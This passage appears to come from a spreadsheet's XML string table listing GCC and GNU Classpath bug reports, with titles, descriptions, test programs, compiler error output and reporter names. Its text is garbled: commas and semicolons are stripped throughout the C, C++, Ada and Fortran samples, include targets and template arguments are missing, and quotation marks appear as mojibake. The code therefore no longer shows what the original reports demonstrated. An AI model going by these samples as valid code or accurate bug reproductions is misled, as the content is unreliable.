$ ~/bin/gcc_216735/bin/gcc -fsanitize=address -S a.c &amp;&amp; grep rdtsc a.s
	rdtsc
$ ~/bin/gcc_216827/bin/gcc -fsanitize=address -S a.c &amp;&amp; grep rdtsc a.s
	call	__builtin_ia32_rdtsc</t>
  </si>
  <si>
    <t>GCC-5510</t>
  </si>
  <si>
    <t>Exceptions causes memory leak</t>
  </si>
  <si>
    <t>Memory leaks are produced when:
   Throwing an exception within a function
   that is called within the parameter-list of another 
   function.
   Pseudo-code:
      ....
      NormalFunc(par1par2FuncTharThrowsException())
      ...
Release:
gcc version 2.95.2
Environment:
Linux SuSE
Intel pentium plattform
How-To-Repeat:
Start the executable called: throw</t>
  </si>
  <si>
    <t>johannes.eder</t>
  </si>
  <si>
    <t>GCC-32164</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] ICE when renaming predefined = and /=</t>
  </si>
  <si>
    <t>(forwarded from the Debian bug tracking system)
package Pak1 is
   type T1 is tagged null record
   function  Eq(X Y : T1) return Boolean renames =
   function Neq(X Y : T1) return Boolean renames /= -- line 4
end Pak1
gnatmake pak1 yields:
gnatmake pak1
gcc-4.1 -c pak1.ads
+===========================GNAT BUG DETECTED==============================+
| 4.1.2 20061115 (prerelease) (Debian 4.1.1-22) (x86_64-pc-linux-gnu)      |
| Assert_Failure einfo.adb:846                                             |
| Error detected at pak1.ads:4:43                                          |
The token that triggers the bug box is the renames in line 4.
Here is a second test case that triggers the same bug box:
package Pak1 is
   type T1 is tagged null record
   function Eq (X Y : T1) return Boolean renames =
   type T2 is new T1 with null record
   function Eq (X Y : T2) return Boolean renames = -- line 6
end Pak1
gnatmake pak1
gcc-4.1 -c pak1.ads
+===========================GNAT BUG DETECTED==============================+
| 4.1.2 20061115 (prerelease) (Debian 4.1.1-22) (x86_64-pc-linux-gnu)      |
| Assert_Failure einfo.adb:846                                             |
| Error detected at pak1.ads:6:43                                          |
The token that triggers this bug box is again the renames in line 6.</t>
  </si>
  <si>
    <t>GCC-8884</t>
  </si>
  <si>
    <t>[3.2 regression] 23_containers/vector_capacity.cc execution test regression</t>
  </si>
  <si>
    <t>There's a regression introducing
FAIL: 23_containers/vector_capacity.cc execution test
between '2002-11-24 05:00 UTC' to '2002-12-09 04:00 UTC'.
Release:
gcc-3_2-branch of '2002-12-09 04:00 UTC'
Environment:
Any of mmix-knuth-mmixware
cris-axis-elf v850-unknown-elf m32r-unknown-elf
mn10300-unknown-elf arm-unknown-elf powerpc-unknown-eabisim
How-To-Repeat:
Build according to 
patch libstdc++-v3/testsuite/Makefile.in like in
 target
v850-unknown-elf m32r-unknown-elf
mn10300-unknown-elf arm-unknown-elf or powerpc-unknown-eabisim.
make check-target-libstdc++-v3 (target-board-option as in simtest-howto)</t>
  </si>
  <si>
    <t>GCC-77713</t>
  </si>
  <si>
    <t>gcc.dg/tree-ssa/builtin-sprintf.c compilation failed to produce executable</t>
  </si>
  <si>
    <t>Hi
gcc.dg/tree-ssa/builtin-sprintf.c fails to build on arm-none-eabi target with the following error:
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c: In function 'test_e_long_double':^M
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:423:16: warning: may write a terminating nul past the end of the destination [-Wformat-length=]^M
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:111:44: note: in definition of macro 'EQL'^M
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:111:11: note: format output between 13 and 14 bytes into a destination of size 13^M
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:423:3: note: in expansion of macro 'EQL'^M
/tmp/ccCIniJQ.o: In function `test_e_long_double':^M
builtin-sprintf.c:(.text+0x16fc): undefined reference to `failure_on_line_423'^M
collect2: error: ld returned 1 exit status^M
compiler exited with status 1
output is:
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c: In function 'test_e_long_double':^M
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:423:16: warning: may write a terminating nul past the end of the destination [-Wformat-length=]^M
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:111:44: note: in definition of macro 'EQL'^M
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:111:11: note: format output between 13 and 14 bytes into a destination of size 13^M
gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:423:3: note: in expansion of macro 'EQL'^M
/tmp/ccCIniJQ.o: In function `test_e_long_double':^M
builtin-sprintf.c:(.text+0x16fc): undefined reference to `failure_on_line_423'^M
collect2: error: ld returned 1 exit status^M
Please let me know of any other information you would need to reproduce this problem.
Best regards.</t>
  </si>
  <si>
    <t>GCC-7301</t>
  </si>
  <si>
    <t>template template parameters are not correctly parsed when using 'typename'</t>
  </si>
  <si>
    <t>The following programs use each 2 template template parameters using the keyword 'typename'. The first template template parameter is used in a member function the second in the classes template-list.
The only difference in code is that the first program does use the keyword 'typename' whereas the second uses 'class'.
According to the standard these can be used interchangeably in template - parameter-lists.
However the first program does not compile the second does compile fine.
#include 
template 
class Factory
{
 	public:
   	template  typename U&gt;
   	U * Create() { return new U }
}       
template  typename Container&gt;
class ContainerClass
{
	private:
   	Container Container_
}
int main(int argc char* argv[])
{                
 	Factory iFactory
   std::vector *iVec = iFactory.Create()
   delete iVec           
   ContainerClass dContainer
   return 0
}      
------------
#include 
template 
class Factory
{
 	public:
   	template  class U&gt;
   	U * Create() { return new U }
}
template  class Container&gt;
class ContainerClass
{
	private:
   	Container Container_
}
int main(int argc char* argv[])
{                
 	Factory iFactory
   std::vector *iVec = iFactory.Create()
   delete iVec
   ContainerClass dContainer
   return 0
}
Release:
gnu 2.95.3-6(mingw special)</t>
  </si>
  <si>
    <t>a9804814</t>
  </si>
  <si>
    <t>GCC-26682</t>
  </si>
  <si>
    <t>gfortran fails with -fwhole-program optimization</t>
  </si>
  <si>
    <t>The following simple.f90 program:
PROGRAM hello_world
  PRINT *Hello World!
END PROGRAM hello_world
does not compile with the following arguments:
gfortran -fwhole-program -O2 -o simple simple.f90
~/gcc_install/lib/gcc/i686-pc-linux-gnu/4.1.0/../../../libgfortranbegin.a(fmain.o)(.text+0x23): In function `main':
../../../gcc-4.1.0/libgfortran/fmain.c:18: undefined reference to `MAIN__'
collect2: ld returned 1 exit status
The program compiles fine with just -O2 or -fwhole-program and prints out the expected Hello World!
I think the problem roughly is that -fwhole-program combined with -O2 is optimizing out the main function since it is not getting called internally.
I was unable to find in the documentation any method of forcing external visiblity in a fortran 90 program.  There was also no mention of gfortran not having -fwhole-program working in http://gcc.gnu.org/onlinedocs/gcc-4.1.0/gcc/Optimize-Options.html</t>
  </si>
  <si>
    <t>jjcogliati-r1</t>
  </si>
  <si>
    <t>CLASSPATH-28422</t>
  </si>
  <si>
    <t>ConvolveOp  troubles</t>
  </si>
  <si>
    <t>java.awt.image.ConvolveOp is rather broken atm:
(1) Sooner or later an IndexOutOfBoundsException is thrown. The operation
    never completes. See below for an example stacktrace. 
    Sorry no testcase yet (will try to submit one later).
(2) The code includes some wait loops -)
    java/awt/image/ConvolveOp.java 263ff:
    for (int y = src.getMinY() y &lt; src.getHeight() + src.getMinY() y++)
      for (int x = src.getMinX() x&lt; src.getWidth() + src.getMinX() x++)
      {
      }
    for (int y = src.getMinY() y &lt; src.getHeight() + src.getMinY() y++)
      for (int x = src.getMinX() x&lt; src.getWidth() + src.getMinX() x++)
      {
      }
(3) Performance is dismal (the example stacktrace below is for a 640x480
    rgb image with 3x3 kernel: jamvm takes 12 seconds to get to the IOOBE 
    while jdk 1.4.2 takes 60 msec to complete the filtering. 
    This gets worse with larger
    images and kernels. For example the jdk needs 343 msec for a 13x13 kernel
    on the 640x480 image while jamvm takes about 5 minutes to get to the
    IOOBE.)
    Cacao is slightly faster than jamvm but tends to throw OutOfMemoryErrors
    on larger images for unknown reasons. -Xmx200m should be enough for
    filtering a single 640x480 image.
java.lang.IndexOutOfBoundsException: 307200 size: 307200
   at gnu.java.awt.peer.gtk.CairoSurface.getElem(CairoSurface.java:283)
   at java.awt.image.DataBuffer.getElem(DataBuffer.java:292)
   at java.awt.image.SinglePixelPackedSampleModel.getSample(SinglePixelPackedSam
pleModel.java:411)
   at java.awt.image.SampleModel.getSampleFloat(SampleModel.java:493)
   at java.awt.image.SampleModel.getSamples(SampleModel.java:587)
   at java.awt.image.Raster.getSamples(Raster.java:886)
   at java.awt.image.ConvolveOp.filter(ConvolveOp.java:245)
   at java.awt.image.ConvolveOp.filter(ConvolveOp.java:134)
   at niffler.actions.ConvolveAction.execute(ConvolveAction.java:45)
   at niffler.actions.NifflerAction.actionPerformed(NifflerAction.java:30)</t>
  </si>
  <si>
    <t>GCC-49825</t>
  </si>
  <si>
    <t>[4.7 Regression] Many testcase failures</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 176697 gave
FAIL: g++.dg/tree-prof/partition2.C compilation  -O1  -fprofile-use
FAIL: g++.dg/tree-prof/partition2.C compilation  -O2  -fprofile-use
FAIL: g++.dg/tree-prof/partition2.C compilation  -O3  -fprofile-use
FAIL: g++.dg/tree-prof/partition2.C compilation  -O3 -g  -fprofile-use
FAIL: g++.dg/tree-prof/partition2.C compilation  -Os  -fprofile-use
Revision 176675 is OK.</t>
  </si>
  <si>
    <t>GCC-24615</t>
  </si>
  <si>
    <t>[4.1 Regression] internal compiler error: in print_shift_count_operand at config/s390/s390.c:4025</t>
  </si>
  <si>
    <t>We ICE during building nss of the mozilla suite.</t>
  </si>
  <si>
    <t>GCC-69816</t>
  </si>
  <si>
    <t>[4.9 Regression] r233410 breaks bootstrap</t>
  </si>
  <si>
    <t>On x86 r233410 caused:
../../../src-trunk/libgfortran/intrinsics/selected_int_kind.f90:28:40:
   integer :: _gfortran_selected_int_kind
                                        1
Error: Symbol \u2018_gfortran_selected_int_kind\u2019 at (1) also
declared as a type at (2)
f951: Fatal Error: Option \u2018-fallow-leading-underscore\u2019 is
for use only by gfortran developers and should not be used for
implicitly typed variables
compilation terminated.
Makefile:5679: recipe for target 'selected_int_kind.lo' failed
make[6]: *** [selected_int_kind.lo] Error 1</t>
  </si>
  <si>
    <t>GCC-21336</t>
  </si>
  <si>
    <t>[3.4 Regression] Internal compiler error when using custom new operators</t>
  </si>
  <si>
    <t>The following piece of code crashes both my custom built gcc 4.0.0 (straight
from an official mirror) and gcc 4.0.0-0.41.fc3 from Red Hat. The code is a
reconstruction of a piece of propriatary code I cannot post. 
CODE:
typedef unsigned int size_t
class A
class B
class C
template inline void* operator new( size_t Size _T
template inline void operator delete( void* _T
class Abase {}
class A : public Abase {
public:
	A() {}
	A(int a int b int c int d) {}
}
class Bbase {}
class B : public Bbase {
public:
	Abase* m() {
		return new(a) A(1234)
	}
	A a
}
class C {
public:
	Bbase* n() {
		return new B()
	}
}
GCC OUTPUT:
main.cpp: In member function â€˜Bbase* C::n()â€™:
main.cpp:29: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccUR3mvM.out file please attach this to
your bugreport.
OTHER COMPILERS:
MSVC++ 7.0 compiles the code above without warnings.
gcc version 3.4.3 20050227 (Red Hat 3.4.3-22.fc3) returns this:
main.cpp: In member function `Bbase* C::n()':
main.cpp:29: error: no suitable or ambiguous `operator new' found in class `B'</t>
  </si>
  <si>
    <t>moudekotte</t>
  </si>
  <si>
    <t>GCC-35993</t>
  </si>
  <si>
    <t>[4.3 regression] wrong answer for all array intrinsics with scalar mask</t>
  </si>
  <si>
    <t>The PRODUCT intrinsic gives the wrong answer when the mask argument is
a scalar expression which evaluates to FALSE.  It's OK with
an array expression that evaluates to all FALSE.
Dick Hendrickson 
      program try ga3019
! fails on Windows XP
! gcc version 4.4.0 20080312 (experimental) [trunk revision 133139]
      call       ga3019(  1  2  3  4)
      end program
      SUBROUTINE GA3019(nf1nf2nf3nf4)
      INTEGER IDA(NF2NF3)
      INTEGER IDA1(NF2NF4NF3)
      ida1 = 3
      ida = -3
      IDA(NF1:NF2NF1:NF3) = PRODUCT(IDA1NF2 NF1 .LT. 0)  !fails
      print '(6I3)' ida
      ida = -3
      IDA(NF1:NF2NF1:NF3) = PRODUCT(IDA1NF2 .false. )    !fails
      print '(6I3)' ida
      ida = -3
      IDA(NF1:NF2NF1:NF3) = PRODUCT(IDA1NF2 ida1 .eq. 137 )    !works
      print '(6I3)' ida
      END SUBROUTINE
C:\gfortran:gfortran ga3019.f
C:\gfortran:a
  1  1  1 -3 -3 -3
  1  1  1 -3 -3 -3
  1  1  1  1  1  1</t>
  </si>
  <si>
    <t>GCC-71349</t>
  </si>
  <si>
    <t>Combined async target clause parsing issues</t>
  </si>
  <si>
    <t>void foo (int *dd)
{
  int i
#pragma omp target teams depend parallel for nowait depend(inout: dd[0])
  for (i = 0 i &lt; 64 i++)
}
should be accepted but is not right now.  This is a problem for both C and C++.
Additionally for C++ we have also parsing issue with
void bar (int *dd)
{
#pragma omp target parallel nowait depend(inout: dd[0])
}</t>
  </si>
  <si>
    <t>GCC-45338</t>
  </si>
  <si>
    <t>Failure on interfacing a function passed as an argument as a custom operator</t>
  </si>
  <si>
    <t>In the testcase below compiled with:
    gfortran -c test.f90
gfortran suffers an internal compiler error:
internal compiler error: in gfc_gen_symbol_decl at fortran/trans-decl.c:893
If the commenting on the marked line is removed then the code compiles fine.
I have tested this case with versions 4.3.2 4.4.1 and 4.6 (experimental from svn trunk last night). It works correctly using ifort PGI and pathscale compilers.
---------------------------------------
module test_mod
    implicit none
contains
    subroutine test_fn (cmp)
        interface operator(.myop.)
            pure function cmp (a b) result(ret)
                integer intent(in) :: a b
                logical ret
            end function
        end interface
        integer :: a b
        !print* cmp(a b)   ! If this line is commented out gfortran has an
                            ! internal compiler error
        print* a .myop. b
    end subroutine
end module</t>
  </si>
  <si>
    <t>sds50</t>
  </si>
  <si>
    <t>GCC-23109</t>
  </si>
  <si>
    <t>[4.1 Regression] compiler generates wrong code leading to spurious division by zero with -funsafe-math-optimizations (instead of -ftrapping-math)</t>
  </si>
  <si>
    <t>The attached code crashes on a division by zero when compiled as follows:
dogbert&gt; gcc -O1 -funsafe-math-optimizations -ftrapping-math b.c
dogbert&gt; a.out
Floating exception
dogbert&gt; gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/usr/local/gcc410
--enable-languages=cc++f95
Thread model: posix
gcc version 4.1.0 20050725 (experimental)
I don't believe that -funsafe-math-optimizations enables -fno-trapping-math but
to be really sure I added the -ftrapping-math command line option. It makes no
difference.
Taken at face value it looks like the optimizer lifts the division by d outside
the conditional on line 19 even though that could lead to a spurious division
by zero and -ftrapping-math is in effect.
This behavior only shows up on the mainline and not on the 3.4 and 4.0
branches. A slightly modified version (to enable FP traps on Suns) also crashes
with gcc 4.1.0 on the target sparc-sun-solaris2.9.</t>
  </si>
  <si>
    <t>GCC-68408</t>
  </si>
  <si>
    <t>broken support for attribute init_priority</t>
  </si>
  <si>
    <t>g++ at version 5.2.1 for sparc-elf misses proper support for attribute init_priority: resulting .ctors section does not have priority number appended to its name as it should be:
$ cat init-priority.cc 
struct A { A() {} } a __attribute__ ((init_priority(365)))
$ ~/try/sparc-elf-5.2.0/bin/sparc-elf-g++ -c -Wa-ahdl -save-temps init-priority.cc -o /dev/null | grep ctors
  83              		.section	.ctors#alloc#write
g++ 3.4.4 on the same target correctly gives:
$ /opt/sparc-elf-3.4.4//bin/sparc-elf-g++ -c -Wa-ahdl -save-temps init-priority.cc -o /dev/null | grep ctors
  73              		.section	.ctors.65170#alloc#write
g++ 5.2.1 on x86 target also correctly gives:
$ ~/try/gcc-5.2.0/bin/g++ -c -Wa-ahdl -save-temps init-priority.cc -o /dev/null | grep init_array
  75              		.section	.init_array.00365aw</t>
  </si>
  <si>
    <t>sorganov</t>
  </si>
  <si>
    <t>GCC-21273</t>
  </si>
  <si>
    <t>gensupport.c:collect_insn_data doesn't consider the constraints of match_scratch</t>
  </si>
  <si>
    <t>collect_insn_data is supposed to figure out the max number of constraints but
doesn't look at the constraints of match_scratch (only match_operand).
Though match_scratch is unlikely to be the only specified constraint in a
pattern (and so unlikely to affect any target) it's nevertheless a bug.</t>
  </si>
  <si>
    <t>GCC-13346</t>
  </si>
  <si>
    <t>bug in gcc while compiling busybox-1.00-pre3</t>
  </si>
  <si>
    <t>fl:/tmp/busybox-1.00-pre3&gt; gcc -v -save-temps -I./include -Wall
-Wstrict-prototypes -Wshadow -Os -march=i386 -mpreferred-stack-boundary=2
-falign-functions=0 -falign-jumps=0 -falign-loops=0 -fomit-frame-pointer
-D_GNU_SOURCE -DNDEBUG     -c -o libbb/dump.o libbb/dump.c
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/3.3/specs
Configured with: ../configure --enable-threads=posix --prefix=/usr
--with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man
--libdir=/usr/lib --enable-languages=cc++f77objcjavaada --disable-checking
--enable-libgcj --with-gxx-include-dir=/usr/include/g++ --with-slibdir=/lib
--with-system-zlib --enable-shared --enable-__cxa_atexit i486-suse-linux
Thread model: posix
gcc version 3.3 20030226 (prerelease) (SuSE Linux)
 /usr/lib/gcc-lib/i486-suse-linux/3.3/cc1 -E -quiet -v -I./include -D__GNUC__=3
-D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -D_GNU_SOURCE -DNDEBUG libbb/dump.c
-march=i386 -mpreferred-stack-boundary=2 -Wall -Wstrict-prototypes -Wshadow
-falign-functions=0 -falign-jumps=0 -falign-loops=0 -fomit-frame-pointer -Os dump.i
#include ... search starts here:
#include  search starts here:
 include
 /usr/local/include
 /usr/lib/gcc-lib/i486-suse-linux/3.3/include
 /usr/i486-suse-linux/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i486-suse-linux/3.3/cc1 -fpreprocessed dump.i -quiet -dumpbase
dump.c -march=i386 -mpreferred-stack-boundary=2 -auxbase-strip libbb/dump.o -Os
-Wall -Wstrict-prototypes -Wshadow -version -falign-functions=0 -falign-jumps=0
-falign-loops=0 -fomit-frame-pointer -o dump.s
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64366
GNU C version 3.3 20030226 (prerelease) (SuSE Linux) (i486-suse-linux)
        compiled by GNU C version 3.3 20030226 (prerelease) (SuSE Linux).
libbb/dump.c: In function `rewrite':
libbb/dump.c:307: error: unrecognizable insn:
(insn:HI 1046 915 1047 33 0x404fa91c (set (reg:CC 17 flags)
        (compare:CC (const:SI (plus:SI (symbol_ref:SI (lcc))
                    (const_int 1 [0x1])))
            (reg/f:SI 116))) -1 (nil)
    (expr_list:REG_DEAD (reg/f:SI 116)
        (nil)))
libbb/dump.c:307: internal compiler error: in extract_insn at recog.c:2175
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The File dump.i.bz2 can be found at
  ftp://ftp.fl.priv.at/pub/special/gcc-bugs/dump.i.bz2
fl:/tmp/busybox-1.00-pre3&gt; gcc --version
gcc (GCC) 3.3 20030226 (prerelease) (SuSE Linux)
Copyright (C) 2002 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
System is SuSE Linux 8.2.</t>
  </si>
  <si>
    <t>fl</t>
  </si>
  <si>
    <t>GCC-35042</t>
  </si>
  <si>
    <t>Documentation for -finline-limit is incorrect</t>
  </si>
  <si>
    <t>Documentation states that the default value of -finline-limit is 600. However if -finline-limit=600 is actually used with -O3 the code size is much bigger than if it weren't used with -O3. The real default value seems to be closer to 180.
Default values specified for max-inline-insns-single (450) and max-inline-insns-auto(90) are not consistent with being -finline-limit / 2.
This is important to fix for people who want to play around with -finline-limit value -- it's good to know what your base is before you change it.</t>
  </si>
  <si>
    <t>ddenisen</t>
  </si>
  <si>
    <t>GCC-25201</t>
  </si>
  <si>
    <t>internal compiler error in open statement</t>
  </si>
  <si>
    <t>gfortran fails in compiling the following program.
I wish this problem fixed soon.
$ cat bug.f90
character(len=12) :: string = SEQUENTIAL
open(10 access=trim(string))
end program 
$ gfortran bug.f90
bug.f90: In function 'MAIN__':
bug.f90:2: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-21353</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] rvalues should not be allowed to be default values for non const references in class functions.</t>
  </si>
  <si>
    <t>works as expected on : gcc 2.95 freebsd/linux
does not work as expected on: gcc 3.4.2 freebsd/linux
//non-const references to temp values should be disallowed
--------------
//the code
enum X{ a b c }
class C
{
public:
       void func( X &amp; ref = a ) //illegal - should not compile.
       { }
}
int main( )
{ }
//compile with gcc 2.95
$g++ test2.cpp
test2.cpp:7: invalid type `X' for default argument to `X &amp;'
//compile with gcc 3.4.2
$g++3 test2.cpp
$ 
----------------
this problem does not exist for functions in global scope.</t>
  </si>
  <si>
    <t>s_siddharth_reddy</t>
  </si>
  <si>
    <t>GCC-10286</t>
  </si>
  <si>
    <t>[3.2.1 regression] [x86] type-punning doesn't work with __m64 and -O</t>
  </si>
  <si>
    <t>the following program (.i attached) prints:
44 33 22 11 00 00 00 00 44 33 22 11 00 00 00 00 44 33 22 11 00 00 00 00 
instead of the expected:
88 77 66 55 44 33 22 11 88 77 66 55 44 33 22 11 88 77 66 55 44 33 22 11 
the generated assembly uses a movd to fill in %mm0 leaving the upper 32-bits empty.
// gcc -O -mmmx -o set64 set64.c
#include 
#include 
#include 
#include 
void
memset64(void *dst uint32_t hi uint32_t lo size_t count)
{
        __m64 *p = (__m64 *)dst
        __m64 fill = _mm_set_pi32(hi lo)
        while (count--) {
                *p++ = fill
        }
}
#define NUM 3 
int
main()
{
        uint8_t *buf = (uint8_t *)calloc(NUM * 2 sizeof(uint32_t))
        int i count = NUM * 2 * sizeof(uint32_t)
        memset64(buf 0x11223344 0x55667788 NUM)
        for (i = 0 i &lt; count i++) {
                printf(%02x  buf[i])
        }
        printf(\n)
        return 0
}
Release:
gcc-3.2.2
Environment:
Mandrake Linux 9.1.1
How-To-Repeat:
run attached program built with -O -mmmx</t>
  </si>
  <si>
    <t>mgw</t>
  </si>
  <si>
    <t>GCC-57497</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in lra_create_new_reg_with_unique_value at  lra.c:155</t>
  </si>
  <si>
    <t>Hello !
The following testcase makes GCC 4.9.0 as of 20130601 ICE at -O3.
$ cat lra.c
int a b
void f(void)
{
    for( a++)
        if(0)
        {
            int *q
lbl1:
            char **p = 0
lbl2:
            while(**p)
                1 
            p = 
        }
        else
        {
            long **t c = 2200000000
            if(b)
            {
                *t = 
                goto lbl1
            }
            goto lbl2
        }
}
$ xgcc -O3 -w lra.c
lra.c: In function â€˜fâ€™:
lra.c:30:1: internal compiler error: in lra_create_new_reg_with_unique_value at 
lra.c:155
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-9002</t>
  </si>
  <si>
    <t>Re: GCJ built multithreaded program keeps creating zombies</t>
  </si>
  <si>
    <t xml:space="preserve"> Wolfgang&gt; When a process (and thus here also a thread) ends it
 Wolfgang&gt; remains a zombie until its return valued is reaped by a
 Wolfgang&gt; waitpid call which should also be what pthread_join
 Wolfgang&gt; does. So unless a thread is joined it will remain a zombie.
 Is this one of those places where Linux threads don't follow posix?
 We create detached threads.  My understanding is that such threads
 *can't* be passed as an argument to pthread_join.
 Incidentally the original reporter sent me email and said that this
 was in fact not a libgcj problem.  I'm including the relevant part of
 this message:
     Since the rt_sig queue under linux is of limitted size and the kernel
     does not clean it up if a process decides to leave signals in the
     queue some random time after booting the system the queue filled up
     and multithreading stopped working.
 I'm going to close the PR.
 Tom
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-35061</t>
  </si>
  <si>
    <t>#pragma pop_macro causes ICE if no  macro value on stack</t>
  </si>
  <si>
    <t>A #pragma pop_macro without a preceding #pragma push_macro  triggers an ICE on  mingw32
// pop_macro.c 
#define X  1
int main()
{
// # pragma push_macro(X)
# undef X
# define X 2
# pragma pop_macro(X)
return 0
}
gcc pop_macro.c
pop_macro.c: In function 'main':
pop_macro.c:9: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-64218</t>
  </si>
  <si>
    <t>[5 Regression] ICE: Segmentation fault (symtab_node::get_alias_target()) running Boost testsuite</t>
  </si>
  <si>
    <t>Following error occurred during compilation of one of the Boost's tests:
../libs/variant/test/recursive_variant_test.cpp:315:1: internal compiler error: Segmentation fault
 }
 ^
0xc9658f crash_signal
?../../gcc/gcc/toplev.c:358
0x8d4280 symtab_node::get_alias_target()
?../../gcc/gcc/cgraph.h:2242
0x8d4280 symtab_node::ultimate_alias_target(availability*)
?../../gcc/gcc/symtab.c:1292
0x12a3b33 cgraph_node::ultimate_alias_target(availability*)
?../../gcc/gcc/cgraph.h:2684
0x12a3b33 want_inline_function_to_all_callers_p
?../../gcc/gcc/ipa-inline.c:840
0x12a3b33 ipa_inline
?../../gcc/gcc/ipa-inline.c:2245
0x12a3b33 execute
?../../gcc/gcc/ipa-inline.c:2558
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Code was compiled with the following flags:
g++  -ftemplate-depth-128 -fno-rtti -O3 -finline-functions -Wno-inline -Wall -fPIC -std=c++11 -march=native -DBOOST_ALL_NO_LIB=1 -DBOOST_NO_RTTI -DBOOST_NO_TYPEID -DNDEBUG  -I.. -c -o /home/trippels/results/boost/bin.v2/libs/variant/test/variant_no_rtti_test.test/gcc-5.0.0/release/pch-off/rtti-off/recursive_variant_test.o ../libs/variant/test/recursive_variant_test.cpp
Sources can be seen here:
https://github.com/boostorg/variant/blob/develop/test/recursive_variant_test.cpp#L315
Exactly the same test compile and pass OK if rtti is on.
P.S.: Sorry for no preprocessed and minimized code I have no access to 5.0.0. I'm trying to contact the test runner but no success at this point.</t>
  </si>
  <si>
    <t>GCC-13787</t>
  </si>
  <si>
    <t>__M32RX__ __m32rx__ __M32R2__ __m32r2__ is not predefined when using -m32rx or -m32r2.</t>
  </si>
  <si>
    <t>__M32RX__ and __m32rx__ is not predefined when using -m32rx.
__M32R2__ and __m32r2__ is not predefined when using -m32r2.</t>
  </si>
  <si>
    <t>inaoka.kazuhiro</t>
  </si>
  <si>
    <t>GCC-70528</t>
  </si>
  <si>
    <t>[5 Regression] bogus error: constructor required before non-static data member</t>
  </si>
  <si>
    <t>Since r225189 LLVM trunk (since commit be4ea76eaa0 ) doesn't build anymore:
In file included from /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/bits/move.h:57:0
                 from /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/bits/stl_pair.h:59
                 from /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/utility:70
                 from /usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/algorithm:60
                 from /home/markus/llvm/include/llvm/ADT/StringRef.h:14
                 from /home/markus/llvm/include/llvm/ADT/StringMap.h:17
                 from /home/markus/llvm/include/llvm/Support/Host.h:17
                 from /home/markus/llvm/include/llvm/ADT/Hashing.h:49
                 from /home/markus/llvm/include/llvm/ADT/ArrayRef.h:13
                 from /home/markus/llvm/include/llvm/ADT/DenseMapInfo.h:17
                 from /home/markus/llvm/include/llvm/ADT/DenseMap.h:17
                 from /home/markus/llvm/lib/Bitcode/Writer/ValueEnumerator.h:17
                 from /home/markus/llvm/lib/Bitcode/Writer/BitcodeWriter.cpp:14:
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits: In substitution of â€˜template static std::true_type std::__do_is_default_constructible_impl::__test(int) [with _Tp = llvm::ValueEnumerator::MDRange  = ]â€™:
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:879:35:   required from â€˜struct std::__is_default_constructible_implâ€™
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:143:12:   required from â€˜struct std::__and_ &gt; std::__is_default_constructible_impl &gt;â€™
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:883:12:   required from â€˜struct std::__is_default_constructible_atomâ€™
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:904:12:   required from â€˜struct std::__is_default_constructible_safeâ€™
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:910:12:   required from â€˜struct std::is_default_constructibleâ€™
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:143:12:   [ skipping 6 instantiation contexts use -ftemplate-backtrace-limit=0 to disable ]
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:715:12:   required from â€˜struct std::is_abstract [1] llvm::SmallDenseMap::LargeRep char char char char char char char char&gt; &gt;â€™
/home/markus/llvm/include/llvm/Support/AlignOf.h:79:13:   required from â€˜constexpr const unsigned int llvm::AlignOf [1] llvm::SmallDenseMap::LargeRep char char char char char char char char&gt; &gt;::Alignmentâ€™
/home/markus/llvm/include/llvm/Support/AlignOf.h:86:52:   required from â€˜struct llvm::AlignOf [1] llvm::SmallDenseMap::LargeRep char char char char char char char char&gt; &gt;â€™
/home/markus/llvm/include/llvm/Support/AlignOf.h:251:8:   required from â€˜struct llvm::AlignedCharArrayUnion [1] llvm::SmallDenseMap::LargeRep char char char char char char char char&gt;â€™
